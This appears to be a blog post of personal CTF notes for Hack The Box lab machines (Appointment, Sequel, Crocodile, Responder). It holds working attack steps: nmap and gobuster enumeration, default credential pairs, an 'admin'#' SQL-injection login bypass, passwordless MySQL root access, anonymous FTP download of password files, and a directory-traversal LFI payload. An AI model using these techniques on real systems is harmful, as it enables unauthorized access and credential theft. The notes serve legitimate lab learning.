Unlike how the media portrays hackers in the media, we're not actually supposed to know everything from the brain. A massive part of it is research skills and I personally believe that the problem solving is more important than memorising all the different commands in linux. That's not only impossible but it also misses the point of what makes hacking fun.
That all said, it would be handy to have my toolbox ready for CTF/Pentesting so that I'd just go for the execution of my ideas right away.
Tier 1.
Appointment
Tools | Description
SQL Injection- exploits the web application to directly query any table found on the SQL Database of the webserver
Anti-SQL Injection- input validation, parameterised queries, stored procedures, WAF (Web Application Firewall)
-sC | scans the most common 1000 TCP ports for active services. Also performs a script scan using the default set of scripts. It is equivalent to script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
-sV | enables version detection, which will detect what version are running on what port
sudo nmap -sC -sV {target IP}
Apache HTTP | runs a free and open-source application that runs web pages on either physical or virtual web servers. Port 80/TCP, 443/TCP, 8080 TCP or 8000 TCP
HTTP | Application layer, transmits HTML-hypermedia docoments
HTTP Responses | contains status codes, which detail the interaction status between the client's request and how the server handled it.
Brute-force | a method of submitting data provided through a specially made list of variables known as the wordlist in an attempt to guess the correct input for it to be validated and access to be gained.
Gobuster | brute-forcing tool
go install github.com/OJ/gobuster/v3@latest | installs go
git clone https://github.com/OJ/gobuster.git | builds source code and compiling
go get && go build | after pull, navigate to the folder / creates gobuster binary
go install | you can run this command at the $GOPATH/bin folder
gobuster --help | help page
/usr/share/wordlists | pre-installed wordlists, dictionaries and rainbow tables pre-installed in Parrot OS
SecList download | https://github.com/danielmiessler/SecLists
git clone https://github.com/danielmiessler/SecLists | downloads
dir | specify that we wish to do web directory enumeration
--url | specify the web address of the target machine that runs the HTTP server
--wordlist | specify the wordlist that we want to use
gobuster dir --url http://{target IP}/ --wordlist {wordlist_location}/directory-list-2.3-small.txt
most common combinations for login | admin:admin, guest:guest, user:user, root:root, administrator:password
Brute-force might sometimes trigger a security measure
SQL Injection | common way of exploiting web pages that use 'SQL statements' that retrieve and store user input date.
ACE | Arbritrary Code Executions' when you run commands or code on a target machine or process.
Username: admin'#
Password: abc123
Here's why it works 😊 When we write this at the front-end..
This happens in the back-end 🤓
That's why input vals are important!
Sequel
Tools | Description
SQL Service | if username and password matches an entry in the database, the SQL service will report it back to the web application, which will, inturn, log the user in, giving them access to the restricted parts of the website. Cookie is then stored locally, browser storage and the webserver.
sudo apt update && sudo apt install mysql* | installs sql service to our local machine we can also use mariadb
mysql --help | displays the help page
Deployment Stage Vulnerability | sometimes it's possible to have passwordless authentication when it's on this stage to allow personnel to easily interact with it.
-h | connect to host
-u | user for log-in if not current user
$ mysql -h {target IP} -u root
SHOW databases; | prints out the databases we can access
USE {database_name}; | set to use the database named {database_name}
SHOW tables; | prints out the available tables inside the current database.
SELECT * FROM {table_name}; | prints out all the data from the table {table_name}
Query-oriented Language | this means that you supply it with one query at a time.
e.g. SHOW databases;
USE htb;
SHOW tables;
SELECT * FROM {table_name}; | sequentially checks for the table's content
Crocodile
Tools | Description
Misconfigured services are vulnerable.
Always start with enumerating the target
sudo nmap -sC -sV {target_ip} | you'll be using this a whole lot!
ftp-anon | anonymous FTP login allowed (FTP code 230)
ftp -h | help page
ftp {target_ip}
dir | checks directory
get | downloads the file
get allowed.userlist
get allowed.userlist.passwd
exit | terminates the FTP connection
cat allowed.userlist
cat allowed.userlist.passwd
540 This FTP server is anonymous only | returns if other credentials are attempted
Wappalyzer | analyses the web page's code and returns all the different technologies used to build it, such as the webserver type, JS libraries and etc.
gobuster dir --url http://{target_ip}/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
http://{target_ip}/login.php
Use the username and password here.
Responder
Tools | Description
-p- | this flag scans for all TCP ports ranging from 0-65535
--min-rate | used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
nmap -p- --min-rate 1000 -sV 10.129.128.223
Windows Remote Management / WinRM | a windows-native built-in remote management protocol that basically uses Simple Object Acces Protocol to interact with remote computers and servers, as well as OS and applications.
echo "10.129.128.223 unika.htb" | sudo tee -a /etc/hosts
File Inclusion Vulnerability | dynamic websites include HTML pages on the fly using information from the HTTP request to include GET and POST parameters, cookies, and other variables.
NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain.
echo "10.129.128.223 unika.htb" | sudo tee -a /etc/hosts
Here I changed site to french. Let's look into this and see if a Local File Inclusion (LFI) vulnerability is actually there.
Local File Inclusion (LFI) occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application.
Remote File Inclusion (RFI) is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.
We can use this in the future to try see if a site is vulnerable to LFI/RFI:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
WINDOWS\System32\drivers\etc\hosts
http://unika.htb/index.php?
page=../../../../../../../../windows/system32/drivers/etc/hosts
We know from here that LFI is possible as we can view the contents of the c:\windows\system32\drivers\etc\hosts
Comments
Post a Comment